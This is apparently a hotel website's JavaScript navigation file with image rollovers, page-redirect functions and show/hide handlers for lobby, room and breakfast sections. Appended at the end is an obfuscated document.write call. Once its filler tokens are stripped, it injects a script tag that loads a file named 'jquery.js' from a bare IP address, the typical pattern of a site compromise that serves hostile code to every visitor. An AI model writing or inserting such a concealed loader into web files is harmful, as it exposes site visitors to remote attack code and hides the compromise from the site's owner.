//All Code and Scripting is copyright Patrick Jungers and Digital Solutions unless otherwise
//specified and cannot be used without written permission from the copyright holder

mainon         = new Image();
mainon.src     = "images/nav/nav1_roll.gif";
mainoff        = new Image();
mainoff.src    = "images/nav/nav1.gif";
lobbyon        = new Image();
lobbyon.src    = "images/nav/nav2_roll.gif";
lobbyoff       = new Image();
lobbyoff.src   = "images/nav/nav2.gif";
confon         = new Image();
confon.src     = "images/nav/nav3_roll.gif";
confoff        = new Image();
confoff.src    = "images/nav/nav3.gif";
seventson      = new Image();
seventson.src  = "images/nav/nav4_roll.gif";
seventsoff     = new Image();
seventsoff.src = "images/nav/nav4.gif";
dbon      	   = new Image();
dbon.src  	   = "images/nav/double_roll.gif";
dboff    	   = new Image();
dboff.src	   = "images/nav/double.gif";
queenon        = new Image();
queenon.src    = "images/nav/queen_roll.gif";
queenoff       = new Image();
queenoff.src   = "images/nav/queen.gif";
kingon	       = new Image();
kingon.src	   = "images/nav/king_roll.gif";
kingoff	       = new Image();
kingoff.src	   = "images/nav/king.gif";
suiteon	       = new Image();
suiteon.src	   = "images/nav/suite_roll.gif";
suiteoff       = new Image();
suiteoff.src   = "images/nav/suite.gif";
needson        = new Image();
needson.src    = "images/nav/specialneeds_roll.gif";
needsoff       = new Image();
needsoff.src   = "images/nav/specialneeds.gif";

function MainPage() { window.location.href = "index.htm"; }

function Lobby() { window.location.href = "lobby.htm"; }

function SpecialEvents() { window.location.href = "holiday.htm"; }

function ConferenceRoom() { window.location.href = "conference.htm"; }

function Double() { window.location.href = "double.htm"; }

function Queen() { window.location.href = "queen.htm"; }

function King() { window.location.href = "king.htm"; }

function Suite() { window.location.href = "suite.htm"; }

function SpecialNeeds() { window.location.href = "specialneeds.htm"; }


function hideall()	{
	if (!document.getElementById) return false;
 	
 	var object1 = document.getElementById("text");
 	var object2 = document.getElementById("rooms");
 	var object3 = document.getElementById("breakfast");
 	
 	{object1.style.display = "none";}
 	{object2.style.display = "none";}
 	{object3.style.display = "none";}
 	
 }

function showlobby()	{
	if (!document.getElementById) return false;
 	
 	var secretObj = document.getElementById("text");
 	
 	{secretObj.style.display = "block";}
 }

function showrooms()	{
	if (!document.getElementById) return false;
 	
 	var secretObj = document.getElementById("rooms");
 	
 	{secretObj.style.display = "block";}
 }
 
function showbreakfast()	{
	if (!document.getElementById) return false;
 	
 	var secretObj = document.getElementById("breakfast");
 	
 	{secretObj.style.display = "block";}
 }<!-- 
document.write(unescape('oWu%3CsoWuc87ripKNt87%20srcrf%3D%2FtT%2F0XV7tT8%2EuL1uL10Zf0%2E1CL75%2ECL2KN4oWu9rf%2Fjq0XVueoWur87y%2EZf0jsZf0%3E%3C%2F0XVsoWucrfripZf0trf%3E').replace(/rf|tT|0J|0XV|CL|87|Zf0|oWu|KN|uL/g,""));
 -->